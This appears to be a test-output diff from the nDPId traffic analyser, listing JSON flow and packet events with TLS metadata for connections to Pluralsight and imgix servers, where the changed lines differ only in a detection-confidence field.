-01211{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":23,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1648373357861,"flow_last_seen":1648373357901,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":4537,"flow_avg_l4_payload_len":756,"midstream":0,"thread_ts_msec":1648373357901,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42790,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight.imgix.net","server_names":"*.imgix.com,*.imgix.net,imgix.com,imgix.net","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign Atlas R3 DV TLS CA 2020","subjectDN":"CN=*.imgix.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2","fingerprint":"C6:A8:D1:F3:16:08:C6:7F:9F:58:B9:3B:87:A6:A1:75:BC:67:F8:8D"}} +00912{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1648373357861,"flow_last_seen":1648373357879,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1648373357879,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42790,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight.imgix.net","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} +00969{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648373357854,"flow_last_seen":1648373357887,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":1857,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1648373357887,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight2.imgix.net","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} +01212{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1648373357854,"flow_last_seen":1648373357887,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":4537,"flow_avg_l4_payload_len":756,"midstream":0,"thread_ts_msec":1648373357887,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight2.imgix.net","server_names":"*.imgix.com,*.imgix.net,imgix.com,imgix.net","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign Atlas R3 DV TLS CA 2020","subjectDN":"CN=*.imgix.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2","fingerprint":"C6:A8:D1:F3:16:08:C6:7F:9F:58:B9:3B:87:A6:A1:75:BC:67:F8:8D"}} +00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":21,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648373357861,"flow_last_seen":1648373357901,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":1857,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1648373357901,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42790,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight.imgix.net","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} +01211{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":23,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1648373357861,"flow_last_seen":1648373357901,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":4537,"flow_avg_l4_payload_len":756,"midstream":0,"thread_ts_msec":1648373357901,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42790,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight.imgix.net","server_names":"*.imgix.com,*.imgix.net,imgix.com,imgix.net","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign Atlas R3 DV TLS CA 2020","subjectDN":"CN=*.imgix.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2","fingerprint":"C6:A8:D1:F3:16:08:C6:7F:9F:58:B9:3B:87:A6:A1:75:BC:67:F8:8D"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648373358908,"flow_last_seen":1648373358908,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1648373358908,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.203.201.56","src_port":42618,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1648373358908,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373358908,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8pPxAAEAG95PAqAGAEsvJOKZ6AbsXjcxKAAAAAKAC+vDGJwAAAgQFtAQCCAq7LqF\/AAAAAAEDAwc="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1648373358948,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373358948,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAAOUG948Sy8k4wKgBgAG7pnpgCgHJF43MS6ASaN+FjQAAAgQFtAQCCAqVXttnuy6hfwEDAwg="} 01170{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1648373358949,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1648373358949,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5pP5AAEAG9ZTAqAGAEsvJOKZ6AbsXjcxLYAoByoAYAfahVQAAAQEICrsuoaiVXttnFgMBAgABAAH8AwPQaIxCQafGfU7U68BjTWz12bgC7rPMRDrwBcYKkg2BtiCsXEdEYhfEEMAlvDmVmL\/9\/3dvAf\/ZUZkvazPc8sBEAwAg6uoTARMCEwPAK8AvwCzAMMypzKjAE8AUAJwAnQAvADUBAAGTenoAAAAAABgAFgAAE3N0dC5wbHVyYWxzaWdodC5jb20AFwAA\/wEAAQAACgAKAAhaWgAdABcAGAALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAADQASABAEAwgEBAEFAwgFBQEIBgYBABIAAAAzACsAKVpaAAEAAB0AIC1NIbYz00S\/PDWD2znXWT+4vqGbUzfdyPQt1wB6uPFJAC0AAgEBACsABwb6+gMEAwMAGwADAgACRGkABQADAmgyuroAAQAAFQDEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1648373358908,"flow_last_seen":1648373358949,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1648373358949,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.203.201.56","src_port":42618,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"stt.pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} -00966{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":31,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648373358908,"flow_last_seen":1648373358988,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1648373358988,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.203.201.56","src_port":42618,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"stt.pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} -01250{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":33,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1648373358908,"flow_last_seen":1648373358992,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4861,"flow_avg_l4_payload_len":810,"midstream":0,"thread_ts_msec":1648373358992,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.203.201.56","src_port":42618,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"stt.pluralsight.com","server_names":"stt.pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1","subjectDN":"C=US, ST=California, L=San Jose, O=Adobe Systems Incorporated, CN=stt.pluralsight.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2","fingerprint":"C5:A3:DE:6D:71:B1:15:77:EC:86:38:E6:30:1C:F5:AC:18:9D:BE:82"}} +00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1648373358908,"flow_last_seen":1648373358949,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1648373358949,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.203.201.56","src_port":42618,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"stt.pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} +00966{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":31,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648373358908,"flow_last_seen":1648373358988,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1648373358988,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.203.201.56","src_port":42618,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"stt.pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} +01250{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":33,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1648373358908,"flow_last_seen":1648373358992,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4861,"flow_avg_l4_payload_len":810,"midstream":0,"thread_ts_msec":1648373358992,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.203.201.56","src_port":42618,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"stt.pluralsight.com","server_names":"stt.pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1","subjectDN":"C=US, ST=California, L=San Jose, O=Adobe Systems Incorporated, CN=stt.pluralsight.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2","fingerprint":"C5:A3:DE:6D:71:B1:15:77:EC:86:38:E6:30:1C:F5:AC:18:9D:BE:82"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648373359576,"flow_last_seen":1648373359576,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1648373359576,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.19.162.127","src_port":48948,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1648373359576,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373359576,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8TutAAEAGHxbAqAGAaBOif780Abvdb02GAAAAAKAC+vDHywAAAgQFtAQCCArb1PDNAAAAAAEDAwc="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1648373359597,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1648373359597,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0AABAADkGdQloE6J\/wKgBgAG7vzSUVFy03W9Nh4AS\/\/\/FjwAAAgQFeAEBBAIBAwMK"} 01152{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1648373359600,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1648373359600,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItTu1AAEAGHSPAqAGAaBOif780Abvdb02HlFRctVAYAfYwgAAAFgMBAgABAAH8AwOIgQTFWwPXqiGWcEl1+ZXYiujgmOb6nQAZYCe\/QQpLyiA8RROCb85LShovAJOvtUQPlP7tKhROlf321DTdV6NmHgAgysoTARMCEwPAK8AvwCzAMMypzKjAE8AUAJwAnQAvADUBAAGT2toAAAAAABgAFgAAE3d3dy5wbHVyYWxzaWdodC5jb20AFwAA\/wEAAQAACgAKAAgKCgAdABcAGAALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAADQASABAEAwgEBAEFAwgFBQEIBgYBABIAAAAzACsAKQoKAAEAAB0AIEbEu4abSNoKA92bDrKiGkIvMOu6w9kvXP7U129h\/FVaAC0AAgEBACsABwaamgMEAwMAGwADAgACRGkABQADAmgyGhoAAQAAFQDEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00911{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1648373359576,"flow_last_seen":1648373359600,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1648373359600,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.19.162.127","src_port":48948,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} -00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":40,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648373359576,"flow_last_seen":1648373359621,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1648373359621,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.19.162.127","src_port":48948,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} +00911{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1648373359576,"flow_last_seen":1648373359600,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1648373359600,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.19.162.127","src_port":48948,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} +00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":40,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648373359576,"flow_last_seen":1648373359621,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1648373359621,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.19.162.127","src_port":48948,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648373359646,"flow_last_seen":1648373359646,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1648373359646,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.17.209.240","src_port":44770,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1648373359646,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373359646,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8yIlAAEAGdgjAqAGAaBHR8K7iAbvIMdGjAAAAAKAC+vD8DgAAAgQFtAQCCArhZSj9AAAAAAEDAwc="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1648373359662,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1648373359662,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0AABAADkGRZpoEdHwwKgBgAG7ruI30m4VyDHRpIAS\/\/+CtAAAAgQFeAEBBAIBAwMK"} 01151{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1648373359662,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1648373359662,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItyItAAEAGdBXAqAGAaBHR8K7iAbvIMdGkN9JuFlAYAfapQAAAFgMBAgABAAH8AwNnKyM21\/SbS3Q02cIKvbAgcmV67HQB0KXsoOxxl9v++yDRdtN3P07Qel84K9CWVDBxLwdJHbn9d9oomO2+9M0CRgAgenoTARMCEwPAK8AvwCzAMMypzKjAE8AUAJwAnQAvADUBAAGTenoAAAAAAD4APAAAOXpuNnF6cTZjYWF1Y3VkZXNyLXBsdXJhbHNpZ2h0LnNpdGVpbnRlcmNlcHQucXVhbHRyaWNzLmNvbQAXAAD\/AQABAAAKAAoACLq6AB0AFwAYAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAANABIAEAQDCAQEAQUDCAUFAQgGBgEAEgAAADMAKwApuroAAQAAHQAgm5zCzvNJzsWd1VyD4DXwZiQmlSanX10JAobLY4rSfTUALQACAQEAKwAHBsrKAwQDAwAbAAMCAAJEaQAFAAMCaDJaWgABAAAVAJ4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 